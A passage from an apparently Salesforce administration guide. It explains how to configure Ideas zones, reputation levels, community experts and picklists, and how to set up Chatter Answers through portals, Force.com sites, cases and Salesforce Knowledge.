who participate in different zones will have different reputation values for each zone based on their activity in that zone. When
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users are logged into the internal application, their reputation score is based on their participation in all zones to which they
belong.

Ideas comes with the following pre-defined reputation levels that apply to all zones and to the internal application. Using the
API, reputation levels and points can be added or edited to reflect the levels of participation in your community.

Points per LevelName

0 – 99Observer

100 – 399Contributor

400 – 1499Influencer

1500+Thought Leader

Reputation levels are available through the API and can be displayed in custom Ideas implementations. To add or edit reputation
level names, points per level, or other attributes of a reputation in any of your zones, use the IdeaReputation and
IdeaReputationLevel objects in the API. You can create up to 25 different reputation levels for each zone.

See Also:
Customizing Ideas Settings

Designating Community Experts
Designate your star users as experts in their communities.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

A community expert is a member of the community who speaks credibly and authoritatively on behalf of your organization.

When a community expert posts a comment or idea, a unique icon ( ) displays next to his or her name so other community
members can easily identify credible information within the community. The Salesforce administrator can designate as many
community experts as necessary.

If you want to have experts within your community, create a public group that includes these users. Then, during the setup
process you will designate this public group as your community experts.

Before you select a public group to be community experts, note the following:

• A community expert can be an employee of your organization who is responsible for providing official responses to the
community, or a community expert can be someone outside your organization who is active within the community and
knowledgeable about the subject matter.

• The only difference between a community expert and other community members is the unique icon that displays next to
the community expert's name. Community experts do not have any extra permissions beyond what is specified in their
user profile and permission sets.

• Community experts must be part of a public group and that public group must be specified in the Experts Group
drop-down list. You may need to create a public group for each community if the experts within those communities are
different.
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• If a community is displayed in a Customer Portal or partner portal, you can use a cascading style sheet (CSS) to change
the icon associated with the community expert. When creating a new portal, specify your CSS in the Header of your
portal and use the expertUserBadge class to reference the new background image for the community expert. We
recommend the community expert icon be no larger than 16 by 16 pixels. .

See Also:
Creating and Editing Zones

Setting Page Layouts for Ideas
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set the layout of a Ideas custom field:

When you create a custom field for Ideas, you can add it to the Additional Information section that appears on the Post Idea
and Idea Detail pages.

You can specify the order in which a custom field appears in the Additional Information section as well as remove a custom
field from these pages without permanently deleting the field from the system. Although it’s possible to move standard fields
onto the page layout, by default they already appear in the Idea Detail section at the top of the page and their order is not
customizable. However, you can drag the Status field to the Additional Information section to have the status of an idea
appear in the page layout.

Note:  The label for the Additional Information section can’t be edited.

To set the page layout of a custom Ideas field:

1. From Setup, click Customize > Ideas > Page Layouts.
2. Click Edit.
3. Select a custom field from the box on the right and drag it to the Additional Information section. Custom fields appear

in the order they are placed in the Additional Information section.
4. To display an idea's status to zone members, select the Status field and drag it to the Additional Information section.
5. To let users add files to ideas, select the Attachments field and drag it to the Additional Information section. Make sure

you’ve set field-level security for your users.
6. Click Save.

See Also:
Defining Picklist Values for the Categories and Status Fields
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Adding Apex Triggers to Idea Comments
Adding Apex triggers to Idea Comments lets you perform actions related to comments that users post to an idea.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Author Apex”To define Apex triggers:

“Customize Application”To manage Ideas communities:

A trigger is a set of Apex code that fires at a particular time in the lifecycle of a record. You can add Apex triggers to comments
in Ideas to better manage ideas in your community.

Use triggers on comments to perform actions such as:

• Send an email notification to the moderator or other userwhen a comment is left on an idea.

• Send an email notification to the user with the contents of their comment.

• Notify the moderator when a specified number of comments is reached for an idea.

• Prevent posting of comments with specific words.

Migrating to the Community Application
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize Ideas settings:

If your organization enabled Ideas prior to the Winter '10 release, we recommend that you migrate to the new Community
application. The Community application:

• Replaces the Ideas application in the Force.com app menu.

• Includes the Ideas and Answers tabs.

Answers is a feature of the Community application that enables users to ask questions and have community members post
replies. Community members can then vote on the helpfulness of each reply, and the person who asked the question can
mark one reply as the best answer.

Warning:  Once you migrate to the Community application, you cannot return to the old Ideas application. The
Ideas tab with all your existing data will still be available in the new Community application.

To migrate to the Community application:
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1. From Setup, click Customize > Ideas > Settings.

The Community message appears at the top of the Ideas Settings page. If the Community message does not appear, the
Community application is already enabled for your organization.

2. Click Enable below the Community message. Salesforce checks your organization for any custom objects named Community.
If such an object exists, you must delete or rename the object before enabling the Community app.

3. Click Enable when Salesforce confirms it's okay to migrate to the Community application.

Customizing Ideas Standard and Custom Fields
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To define picklist values:

“Customize Application”To set field level security:

“Customize Application”To define or change field validation rules:

“Customize Application”To create Ideas custom fields:

“Customize Application”To enable attachments for ideas:

Administrators can customize Ideas standard and custom fields to meet the needs of an organization's unique requirements:

• Define picklist values for the Categories and Status fields.

• Click the name of a standard or custom field to set field-level security.

• Click the name of a custom field to set validation rules.

• Create a custom field for Ideas. Custom fields appear in the Additional Information section on the Post Idea and Idea
Detail pages.

• Add the Attachment field to the layout and set field-level security. Users can attach all supported file types, including
Microsoft® PowerPoint® presentations and Excel® spreadsheets, Adobe® PDF files, image files, audio files, and video files.
The maximum attachment size is determined by your organization.

Note:  In custom implementations of Ideas, you can use the URL.getFileFieldURL Apex method to retrieve
the download URL for file attachments.

See Also:
Customizing Ideas Settings
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Selecting Picklist Values and Defaults for a Zone

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To add or remove picklist values from a zone:

After you define picklist values for the Categories and Status fields, you can add and remove picklist values from these
fields on a per-zone basis and specify a default value. This allows you to customize the Categories and Status fields based
on the unique purpose of a zone. For information, see Defining Picklist Values for the Categories and Status Fields on page
2035.

To add or remove picklist values from a specific zone:

1. From Setup, click Customize > Ideas > Zones.
2. Click the name of the zone.
3. In the Idea Picklists Available for Editing section, click Edit next to the Categories or Status field.
4. To remove a picklist value, select the value from the Selected Values list and click Remove.
5. To add a picklist value to the zone, select the value from the Available Values list and click Add.
6. To specify a default value for the field, use the Default drop-down list.
7. Click Save.

See Also:
Creating and Editing Zones

Defining Picklist Values for the Categories and Status Fields

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To define picklist values:

Overview

For members of a zone to assign categories to an idea or be able to view an idea's status, the Ideas administrator needs to define
picklist values for the Categories and Status fields. These fields are only available in an ideas community and not in an
answers community.
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Categories are administrator-defined values that help organize ideas into logical sub-groups within a zone. The View Category
drop-down list on the Ideas tab allows users to filter ideas by category, and the Categories picklist on the Post Ideas page
lets users add categories to their ideas.

An idea's status helps zone members track the progress of the idea. For example, “Under Review”, “Reviewed”, “Coming
Soon”, and “Now Available” are common status values an administrator can define and assign to ideas. An idea's status appears
next to the idea's title for all zone members to see.

Note:  If the Category field is displayed (instead of Categories), then your zone members can only assign a single
category to an idea. To allow them to assign multiple categories to an idea, from Setup click Customize > Ideas >
Settings and enable Categories.

Defining Picklist Values

To define picklist values for the Categories and Status standard fields:

1. From Setup, click Customize > Ideas > Fields.
2. Click Edit next to the Categories or Status standard field.
3. On the picklist edit page, click New to add new picklist values to the standard field. You can also edit, delete, reorder, and

replace picklist values.

Note:  Once you add picklist values to the Categories or Status field, the field will always require at least one
picklist value. This means you can delete picklist values until there is one remaining for the field.

4. Add one or more picklist values (one per line) in the provided text area.
5. Select the zones that you want to include the new picklist values.
6. Click Save.
7. To specify a default value for the Categories or Status fields, see Selecting Picklist Values and Defaults for a Zone

on page 2035.

Note:  Do not use the Edit link on the Fields page to specify a default value for Categories or Status. You
can only specify a default value from the Zone Detail page.

8. To display an idea's status to zone members, select the Status field and drag it to the Additional Information section.
You can find this field under Setup at Customize > Ideas > Fields Layout.

Once you select this checkbox, you can assign a status to any idea when you post a new idea or edit an existing idea.

See Also:
Managing Ideas
Selecting Picklist Values and Defaults for a Zone
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Enabling the Categories Field

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize Ideas settings:

Organizations using the Category field can switch to the multi-select Categories field that allows zone members to
associate more than one category with an idea. The Category field only allows one category to be associated with an idea.

Warning:  Once you enable the Categories field, you cannot disable it. Also, enabling the Categories field
automatically disables the old Category field in Salesforce and the API.

When you enable the Categories field, Salesforce automatically does the following:

• Checks your organization's workflow rules, triggers, validation rules, custom fields, and Apex code and lists any area that
references the Category field. You must manually fix or remove these references before Salesforce allows you to enable
the Categories field.

• Automatically moves all picklist values and search layouts from the old Category field to the new Categories field.

• Ensures each idea is associated with the appropriate picklist value in the new Categories field.

• Makes the new Categories field available in Salesforce and the API.

To enable the Categories field:

1. From Setup, click Customize > Ideas > Settings.
2. Click Enable located below the Categories message at the top of the page. This button is not displayed if your organization

already has the Categories field enabled.

Salesforce checks your organization's workflow rules, triggers, validation rules, custom fields, and Apex code for references
to the Category field and lists any areas where this reference needs to be removed.

3. If you need to remove references to the Category field, click Cancel. Once you have removed the references, try enabling
the Categories field again.

Note:  For validation and workflow rules you must delete the rule or fix the Category reference within the rule.
It is not sufficient to deactivate the rule. If you need to delete a custom field that references the Category field,
make sure to erase the field after it has been deleted. .

4. Read the information in the pop-up window, and click Enable. It may take several minutes for Salesforce to enable the
new field.

5. Fix any custom reports that reference the old Category field.

See Also:
Customizing Ideas Settings
Selecting Picklist Values and Defaults for a Zone
Defining Picklist Values for the Categories and Status Fields
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Enabling Idea Themes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize Idea Themes settings:

1. From Setup, click Customize > Ideas > Idea Themes > Settings.
2. Click Edit.
3. Select Enable Idea Themes.
4. Click Save.

See Also:
Customizing Ideas Settings

CHATTER ANSWERS COMMUNITIES

Chatter Answers Implementation Overview
Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

Note: We recommend that advanced Salesforce administrators and developers set up and maintain Chatter Answers,
as it involves several Salesforce features.

Chatter Answers integrates Cases, Answers, Force.com Sites, Customer Portal, and Salesforce Knowledge to provide you
with a zone for your customers. Before administrators can set up Chatter Answers, their organizations must have implemented
Data Categories. If you want Salesforce Knowledge articles to display in your zones, then administrators need to implement
Salesforce Knowledge.

Unlike other Salesforce features, Chatter Answers spans across several areas of setup. There isn’t one location in Salesforce
where you can update and configure all of the settings related to Chatter Answers. For example, configuring Chatter Answers
might require you to update Customer Portal settings from Setup by clicking Customize > Customer Portal > Settings, as
well as Force.com Site settings by clicking Develop > Sites.

Setting up Chatter Answers also includes customizing or maintaining:

• Cases

• Case assignment rules
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• Workflow rules on cases or questions

• Apex triggers on questions

• Visualforce pages

• Customer Portal users

• Organization-wide sharing defaults

• Feature licenses

Customizing the appearance of your Chatter Answers zone to match your company’s branding involves creating or updating
Visualforce pages and adding them to the Force.com Site used to host your zone.

See Also:
Setting Up Chatter Answers

Setting Up Chatter Answers
Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Users”

AND

“Edit Self-Service Users”

To set up Chatter Answers:

Note: The steps below are general guidelines for setting up Chatter Answers. Chatter Answers integrates several
Salesforce features, including features administrators may have implemented already, so each Chatter Answers
implementation may be different. Contact salesforce.com for specifics on your implementation.

Before administrators can set up Chatter Answers, their organizations must have implemented Data Categories. If you want
Salesforce Knowledge articles to display in your zones, then administrators need to implement Salesforce Knowledge.

1. Enable Chatter Answers.
2. Configure email notification settings.
3. Implement a Customer Portal (if one doesn’t already exist for your organization).
4. Configure your organization’s Customer Portal for Chatter Answers.
5. Configure high-volume portal users for self-registration.
6. Implement a Force.com site (if one doesn’t already exist for your organization and you want to use a site).
7. Configure your organization’s Force.com site for Chatter Answers.
8. Configure cases for Chatter Answers.
9. Set Questions tab visibility.
10. Optionally:
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• Assign data categories to Chatter Answers.
• Configure Salesforce Knowledge for Chatter Answers.
• Add Chatter Answers to your Customer Portals or Partner Portals.

11. Configure one or more zones on page 2020.
12. Troubleshoot any setup issues.

Important: After you set up Chatter Answers, it may not work properly if you change any of the configurations in
the features mentioned above. If certain configuration issues are detected, Salesforce sends email notifications to the
Site Contact user.

Tip:

• You can add custom fields to questions or replies for API integration purposes only. For example, add a custom
text field to questions and use the API to populate that text field with the name of the country from which each
question is posted. Any custom fields you create for questions or replies can’t display in the Salesforce user interface.

• You can customize fields, page layouts, buttons and links, Apex triggers, and validation rules for questions and
replies for Chatter Answers from Setup by clicking Customize > Chatter Answers and choosing the appropriate
setting.

• You can rename Customer Support on your zones’ user interface. For example, you can change “Customer
Support” to “Acme Support.” Just edit the Customer Support label on the Question object.

• You can rename the Chatter Answers tab in your portal, as well.

See Also:
Chatter Answers Implementation Overview
Chatter Answers Implementation Guide

Enabling Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To enable Chatter Answers:

Enable Chatter Answers to set up Chatter Answers zones.

1. From Setup, click Customize > Chatter Answers > Settings.
2. Click Edit.
3. Select Enable Chatter Answers.
4. Optionally, select:
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DescriptionOption

Lets you add Chatter Answers as a tab to your Customer
Portal or Partner Portal. If you choose this option, you must

Show Chatter Answers in Portals

add the Chatter Answers tab to each portal and assign the
Chatter Answers User license to portal users.

If you only want to display Chatter Answers in your portals,
then you don’t need to set up a Force.com site to host
Chatter Answers. However, a site lets guest users access
some Chatter Answers data without a login, whereas portals
do not.

Lets users filter search results by articles or questions before
they post a question to any of your Chatter Answers zones.

Optimize Question Flow

Also, adds Title and Body fields to questions for easier
text input and scanning. This setting is turned on
automatically when you enable Chatter Answers.

Lets zone members use the rich text editor to format text
and upload images when posting questions.

Enable Rich Text Editor

Lets users earn points and ratings that display as hover text
on their profile pictures.  Reputation is enabled across all

Enable Reputation

zones. This setting is turned on automatically when you
enable Chatter Answers.

Lets users sign in to your Chatter Answers zones with their
Facebook logins. If you choose this setting, your zones

Enable Facebook Single Sign On

display an option to Sign in with Facebook next to
your zones’ Sign In. When a user signs in to Chatter
Answers with a Facebook login, the first name, last name,
and the photo associated with the Facebook account is used
in posts to your zones.

When you enable this feature, you must define and enable
a Facebook authentication provider in your organization’s
security controls.

Lets you choose an existing Facebook authentication provider
after you select Enable Facebook Single Sign On.

Facebook Authentication Provider

You must choose a Facebook authentication provider to
implement Facebook Single Sign On for your Chatter
Answers zones. This setting is ignored if you have associated
the Chatter Answers zone to a Chatter community with a
different Facebook authentication provider.

Lets you select a custom Visualforce page for users’ profiles
for Chatter Answers on a public Chatter community site.

Custom Profile Page

You must have Visible without authentication set for the
zone in order for the user profile pages to be used. The
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DescriptionOption

following attributes are passed to the custom Visualforce
page that you select:
• communityId. This attribute indicates which zone the

currently selected feed item, such as a question or a reply,
belongs to.

• userId. This attribute indicates the owner of the
currently selected feed item, such as a question or a reply.

• showHeader. This attribute is a Boolean value that
specifies whether the Salesforce tab header is included
in the page. If this attribute is set to true, the Salesforce
tab header is displayed.

5. Click Save.

After you enable Chatter Answers, several items are automatically added to your organization for use with setting up zones:

• A Q&A tab where internal users and administrators can view and use Chatter Answers. Administrators can rename this
tab.

• Standard permission settings for Questions on user profiles so that you can grant users permissions to questions and replies.
• Visualforce pages that you add to a Force.com site so that users can register, sign in, and view feed items on a zone.
• An Apex trigger for questions named chatter_answers_question_escalation_to_case_trigger so that

questions with specified attributes are automatically escalated to cases.
• A workflow field update named chatter_answers_num_subscriptions_above_ so that when a question is escalated

to a case, Priority on questions is updated.
• Two workflow rules, chatter_answers_no_best_reply_within_time_limit_wf and

chatter_answers_num_subscriptions_above_limit_wf, which you can customize and activate so that questions
without best replies or questions with a specified number of followers are automatically escalated to cases.

See Also:
Chatter Answers Implementation Overview
Setting Up Chatter Answers

Visualforce Pages for Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

After you enable Chatter Answers, the Visualforce pages below are automatically added to your organization. You can use
these pages to set up and configure Chatter Answers.

DescriptionVisualforce page

The Visualforce component that displays questions on case
detail pages when questions are converted to cases. This

ChatterAnswersAgentView
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DescriptionVisualforce page

component is optional and offers an alternative to the case
detail page.

The page where users can change their passwords to your zone.ChatterAnswersChangePassword

The forgot password page for your zone.ChatterAnswersForgotPassword

The forgot password confirmation page for your zone.ChatterAnswersForgotPasswordConfirm

The online help page displayed to users when they click Need
Help?.

ChatterAnswersHelp

The login page for your zone.ChatterAnswersLogin

The page where users can self-register for access to your zone.ChatterAnswersRegistration

The page that includes the question, reply, and Salesforce
Knowledge article feeds for your zone. This page is also used

When you create a zone, the following page is added to your
organization: Community Name_main

(Home Page)
to determine the community from which email notifications
are sent to users.

This page is automatically generated when you save a new
zone without choosing Visualforce Page That Hosts
Your Community’s Feeds. The generated page includes
your zone’s ID so that topics, questions, and replies are
associated with your specific zone and can display on it. The
page is named after your zone with a suffix of “_main,” for
example, ZoneName_main. The page also includes a language
attribute that matches your organization’s default language.

See Also:
Enabling Chatter Answers
Setting Up Chatter Answers
Visualforce Overview
Customizing Chatter Answers in Portals using Visualforce Pages

Customizing Chatter Answers in Portals using Visualforce Pages

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

You can create a Visualforce page that displays a Chatter Answers zone in a Customer Portal or Partner Portal. By using a
Visualforce page, you can add custom widgets to Chatter Answers, such as announcements or ads, which let you extend your
branding and change the experience for users. The page you create must include the chatteranswers:allfeeds component
to display the zone. After users log in to one of your portals, they can access Chatter Answers from a tab and interact with
that zone. When you add Chatter Answers using a Visualforce page, users see only the zone that is related to the page; they
can’t switch zones as they can when using the standard Chatter Answers tab on a portal.
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Note: The Visualforce page is visible to portal users only. Internal users can see the Chatter Answers tab, but they
need to log in through the portal to view the contents of the tab using the portal.

See Also:
Adding a Custom Visualforce Page to a Portal
Visualforce Pages for Chatter Answers

Configuring Email Notifications for Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To configure email notifications for your Chatter Answers
zones:

Determine when emails are sent to users by configuring the notification settings that apply to all of your zones. Each email
includes a link to a specific zone so that users can easily return to it.

1. From Setup, click Customize > Chatter Answers > Email Notification Settings.
2. Click Edit.
3. Choose from the following settings:

DescriptionOption

Notify customers when other users reply to their questions.Replies to a question they own

Notify customers when other users reply to questions they’re
following.

Replies to a question they follow

Notify customers when a best answer is selected for a
question they’re following.

Selects a best answer on a question they
follow

Notify customers when customer support responds to their
questions privately.

Sends a private reply to their question
(Customer Support)

4. Click Save.

See Also:
Chatter Answers Implementation Overview
Setting Up Chatter Answers
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Configuring a Customer Portal for Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To set up and update the Customer Portal:

Note:  Even if you don’t plan on using a Customer Portal, you must configure one for Chatter Answers to authenticate
users who sign in to your Chatter Answers zone.

1. From Setup, click Customize > Customer Portal > Settings.
2. Click Edit next to the Customer Portal you want to configure for Chatter Answers.
3. Click Login Enabled to let customers sign in to Chatter Answers.
4. In From Email Address, type the address from which all email communications from your Chatter Answers zone are

sent. For example, support@acme.com.
5. In From Email Address Name, type the name associated with the From Email Address. For example, Acme

Customer Support.
6. Click Self-Registration Enabled to let customers register themselves for access to Chatter Answers.
7. In Default New User License, choose the portal user license that’s automatically assigned to customers who

self-register. We recommend you choose the High Volume Customer Portal license.
8. In Default New User Profile, choose the profile that’s automatically assigned to customers who self-register. We

recommend you choose the profile you cloned and customized for self-registration.
9. Click Save.
10. Assign the profile you selected as the Default New User Profile to your Customer Portal so that users can sign in

to your zone:

a. From Setup, click Customize > Customer Portal > Settings.
b. Select your portal’s name.
c. In the Assigned Profiles section, click Edit Profiles.
d. Click Active next to the profile you selected as the Default New User Profile.
e. Click Save.

See Also:
Chatter Answers Implementation Overview
Setting Up Chatter Answers
Enabling Customer Portal Login and Settings
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Configuring Portal Users for Self-Registration to Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To set up and update the Customer Portal:

“Edit Self-Service Users”To manage Customer Portal users:

Configure Customer Portal users for self-registration to your Chatter Answers community.

1. Clone the High Volume Customer Portal profile so that you can customize it:

a. From Setup, click Manage Users > Profiles.
b. Click Clone next to High Volume Customer Portal.
c. Type a name for the new profile.
d. Click Save.

2. Customize the cloned profile to include permissions to the standard objects on your community:

a. From Setup, click Manage Users > Profiles.
b. Click the name of the cloned profile.
c. Click Edit.
d. In Standard Object Permissions, click on the following permissions to these objects:

PermissionsObject

Read, CreateCases

ReadContacts

Read, CreateQuestions

ReadAccount

e. Click Save.

See Also:
Setting Up Chatter Answers
Configuring a Customer Portal for Chatter Answers
Chatter Answers Users Overview
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Configuring a Force.com Site for Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To create and edit Force.com sites:

Note:  Configuring a Force.com site is recommended for self-service communities.

Configure a Force.com site for Chatter Answers to host a domain and publicly display some of your Salesforce data, such as
questions, replies, and Salesforce Knowledge articles.

1. From Setup, click Develop > Sites.
2. Click Edit next to the name of the site you want to configure for Chatter Answers.
3. Click Active to activate the site.

You can activate the site after you’ve finished setting up Chatter Answers.

4. In Active Site Home Page, choose a Visualforce page as the home page for your site.
5. Click Save.
6. Click Edit on the Site Visualforce Pages related list.

a. Use the Add and Remove buttons to enable the following Visualforce pages for your site:

• ChatterAnswersAgentView

• ChatterAnswersChangePassword

• ChatterAnswersForgotPassword

• ChatterAnswersForgotPasswordConfirm

• ChatterAnswersHelp

• ChatterAnswersLogin

• ChatterAnswersRegistration

b. Click Save.

7. Click Public Access Settings to grant guest users (unauthenticated, non-Customer Portal users) access to cases, questions,
and Salesforce Knowledge articles.

a. Click Edit on the profile for Chatter Answers users.
b. In Standard Object Permissions, click Read on Cases and Questions.
c. Optionally, if you want articles to display in Chatter Answers , click Read on articles types in Article Type Permissions.
d. Click Save.

8. Click Edit next to a category group in the Category Group Visibility Settings related list to grant users access to the
categories so that they can browse questions, replies, and Salesforce Knowledge articles.

a. Next to Visibility, click All Categories.
b. Click Save.
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9. Return to the site and select its name from Setup by clicking Develop > Sites.
10. Click Login Settings to enable user authentication for the site.

a. Click Edit.
b. In Enable Login For, choose the Customer Portal you created for Chatter Answers.
c. Click Save.

After you configure your Force.com site for Chatter Answers, you can replace the default Visualforce pages that make up your
community with customized ones. The Visualforce pages are automatically set to your site’s URL so that portal users can
navigate to them.

Note: Chatter Answers is compatible with custom URL rewriters for sites.

1. From Setup, click Customize > Chatter Answers > Sites Settings.
2. Click Edit next to a site.
3. Choose the pages to replace. If you replace the Change Password Page, the Change Password Page for your site

is automatically updated too.
4. Click Save.

Note: Internet Explorer 8 users receive a security warning if you customize with URLs that don't include https://.

See Also:
Chatter Answers Implementation Overview
Setting Up Chatter Answers
Visualforce Pages for Chatter Answers
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Configuring Cases for Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To set organization-wide sharing defaults:

“Customize Application”To set field-level security:

“Customize Application”To customize fields:

To create assignment rules:

To grant high-volume portal users access to cases:

Configure case features for Chatter Answers so that cases are created, escalated, and accessed by the appropriate users of your
Chatter Answers zones.

1. Set your organization-wide sharing defaults to Private on Account, Controlled by Parent on Contact, and
Private on Case to prevent users from accessing each others’ information.

2. Set field-level security on Question on cases to Visible for profiles assigned to your Customer Portal so that users can
access their private questions.

3. Update Origin on cases with the value in the Question trigger so that support agents can see which cases originated from
Chatter Answers.

4. Create a case assignment rule where Case Origin equals the value of Chatter Answers so that cases created from private
questions are assigned to support agents.

5. Grant high-volume portal users access to cases so that they can access their private questions on Chatter Answers.

See Also:
Setting Up Chatter Answers
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Setting Questions Tab Visibility

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Manage Users”To set Questions tab visibility:

Set the visibility of the Questions tab to Default On so that support agents can view, search, filter, and moderate questions
posted to your Chatter Answers zones.

1. From Setup, click Manage Users > Profiles.
2. Select a support agent profile.
3. Depending on which user interface you're using, do one of the following:

• Enhanced profile user interface—In the Find Settings... box, enter the name of the tab you want and select it from
the list, then click Edit.

• Original profile user interface—Click Edit, then scroll to the Tab Settings section.

4. Specify the visibility of the Questions tab to Default On.
5. (Original profile user interface only) To reset users’ tab customizations to the tab visibility settings that you specify, select

Overwrite users' personal tab customizations.
6. Click Save.

See Also:
Setting Up Chatter Answers

Assigning Data Categories to Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To assign data categories to Chatter Answers:

Assign a data category group to Chatter Answers so that it’s available to all of your Chatter Answers zones. You configure
each zone with a top-level data category (topic) in which customers and support agents can categorize and filter questions and
knowledge articles.

1. From Setup, click Customize > Chatter Answers > Data Category Assignments.
2. Click Edit.
3. Select a category group.
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4. Click Save.

See Also:
Setting Up Chatter Answers
What are Data Categories?

Configuring Salesforce Knowledge for Chatter Answers

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Manage Users”To create or edit users:

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create article types and article actions:

“Manage Synonyms”To manage synonyms:

“Manage Data Categories”To create data categories:

To display Salesforce Knowledge articles in your Chatter Answers zones, you must:

1. Implement Data Categories (if you haven’t done so already).
2. Implement Salesforce Knowledge (if you haven’t done so already).
3. Configure both for Chatter Answers.

You configure each zone with a top-level data category (topic) in which customers and support agents can categorize and filter
questions and knowledge articles.

1. If you use role-based data category visibility, set the Default Data Category Visibility to All Categories so that customers
not included in your organization’s role hierarchy, such as high-volume portal users, can access categories that include
questions and Salesforce Knowledge articles.

Alternatively, use permission sets or profiles to set data category visibility.

2. Create one category group for all of your communities so that you’re less likely to reach the limit of three active data
categories. Then add a child category for each community; and add child categories to those categories to provide topics.

3. Activate the category group you want available to Chatter Answers so that users can access it.
4. Grant “Read” permissions to specific article types on the profiles of Chatter Answers users so that they can access articles

from your zones.
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5. Optionally, allow support agents to promote replies to draft articles in the knowledge base so that your support team can
capture useful information quickly.

See Also:
Chatter Answers Implementation Overview
Setting Up Chatter Answers
About Category Group Visibility
Creating and Modifying Category Groups

Adding Chatter Answers to a Portal

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

You can add Chatter Answers to an existing Customer Portal or Partner Portal so that portal users can access Chatter Answers
zones from one of your established channels. After users log in to one of your portals, they can access Chatter Answers from
a tab and choose which zone to view from a drop-down list. If you only want to display Chatter Answers in your portals, then
you don’t need to set up a Force.com site to host Chatter Answers. However, a site lets guest users access some Chatter Answers
data without a login, whereas portals do not.

The following occurs to Chatter Answers when it appears in a portal:

• Chatter Answers displays as a tab, which you can rename.

• A drop-down list lets portal users switch between all of your Chatter Answers zones.

• The My Settings link for users is replaced by Enable Emails and Disable Emails.

• Sign In and Sign Up are removed because portal users can only view Chatter Answers after they’ve logged in to your portal.

• Chatter Answers displays a look and feel, which you can’t customize.

• The Need help? link is removed.

• If you display Chatter Answers with a Visualforce page on a portal, the option for users to switch zones in a portal isn’t
available.

See Also:
Setting Up Chatter Answers
Setting Up Your Customer Portal
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Adding Chatter Answers to a Customer Portal

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To add Chatter Answers to a Customer Portal:

You can add Chatter Answers to an existing Customer Portal so that portal users can access Chatter Answers zones from one
of your established support channels.

1. Enable Chatter Answers for portals:

a. From Setup, click Customize > Chatter Answers > Settings.
b. Click Edit.
c. Select Show Chatter Answers in Portals.
d. Click Save.

2. Edit Customer Portal user profiles to support Chatter Answers.

Using the enhanced profile user interface, follow these steps:

a. From Setup, click Manage Users > Profiles.
b. Click Edit next to a portal user profile.
c. In the Apps section of the page, select Object Settings.
d. On the Object Settings page, select Q&A.
e. In Tab Settings, select Default On.
f. Click Save and navigate back to the Objects Settings page.
g. Select Questions and Answers, and in the Object Permissions section select Read and Create.
h. Click Save.

Using the original profile interface, follow these steps:

a. From Setup, click Manage Users > Profiles.
b. Click Edit next to a portal user profile.
c. In Tab Settings, select Default On for Q&A.
d. In Standard Object Permissions, select Read and Create on Questions.
e. Click Save.

3. Add the Chatter Answers User feature license to Customer Portal users:

a. From Setup, click Manage Users > Users.
b. Click Edit next to a portal user.
c. In the General Information area, select Chatter Answers User.
d. Click Save.

4. Add Chatter Answers as a tab to your Customer Portal:

a. From Setup, click Customize > Customer Portal > Settings.
b. Click the name of a Customer Portal.
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c. Click Customize Portal Tabs.
d. Select Q&A and click the Add arrow to move it into the Selected Tabs box.
e. Click Save.

5. Optionally, rename the Q&A tab for your Customer Portal:

a. From Setup, click Customize > Tab Names and Labels > Rename Tabs and Labels.
b. Click Edit next to Questions.
c. Click Next.
d. In Other Labels, rename Q&A. You can only rename it as Singular, not Plural.
e. Click Save.

See Also:
Adding Chatter Answers to a Portal

Adding Chatter Answers to a Partner Portal

Chatter Answers is available in: Enterprise, Developer, and Unlimited Editions.

User Permissions Needed

“Customize Application”To add Chatter Answers to a Partner Portal:

You can add Chatter Answers to an existing Partner Portal so that portal users can access Chatter Answers zones from one
of your established partner channels.

1. Enable Chatter Answers for portals:

a. From Setup, click Customize > Chatter Answers > Settings.
b. Click Edit.
c. Select Show Chatter Answers in Portals.
d. Click Save.

2. Edit Partner Portal user profiles to support Chatter Answers:

a. From Setup, click Manage Users > Profiles.
b. Click Edit next to a portal user profile.
c. In the Apps section of the page, select Object Settings.
d. On the Object Settings page, select Q&A.
e. In Tab Settings, select Default On.
f. Click Save and navigate back to the Objects Settings page.
g. Select Questions and Answers, and in the Object Permissions section select Read and Create.
h. Click Save.

3. Add the Chatter Answers User feature license to Partner Portal users:
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a. From Setup, click Manage Users > Users.
b. Click Edit next to a portal user.
c. In the General Information area, select Chatter Answers User.
d. Click Save.

4. Add Chatter Answers as a tab to your Partner Portal:

a. From Setup, click Customize > Partners > Settings.
b. Click the name of a Partner Portal.
c. Click Customize Portal Tabs.
d. Select Chatter Answers and click the Add arrow to move the Chatter Answers tab into the Selected Tabs box.
e. Click Save.

5. Optionally, rename the Chatter Answers tab for your Partner Portal:

